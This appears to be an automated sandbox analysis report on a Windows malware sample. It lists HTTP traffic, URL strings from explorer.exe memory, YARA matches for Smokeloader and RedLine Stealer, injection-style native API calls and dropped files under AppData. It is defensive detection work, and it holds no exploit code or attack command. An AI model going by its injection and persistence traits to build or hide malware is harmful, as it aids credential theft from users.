      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1733819519.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1733347044.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1735918498.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C99C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1729931330.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1734283056.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1734283056.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
      Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50575
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:50575 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00403103 RtlCreateUserThread,NtTerminateProcess,6_2_00403103
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_004014FB HeapCreate,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FB
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401641
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00403257 RtlCreateUserThread,NtTerminateProcess,6_2_00403257
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401606
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401613
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401627
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015FB
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00403103 RtlCreateUserThread,NtTerminateProcess,8_2_00403103
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_004014FB HeapCreate,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014FB
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401641
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00403257 RtlCreateUserThread,NtTerminateProcess,8_2_00403257
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401606
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401613
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401627
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015FB
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00415B000_2_00415B00
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_00415B005_2_00415B00
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_004157A06_2_004157A0
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_004157A08_2_004157A0
      Source: wBgwzVbZuV.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: F421.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
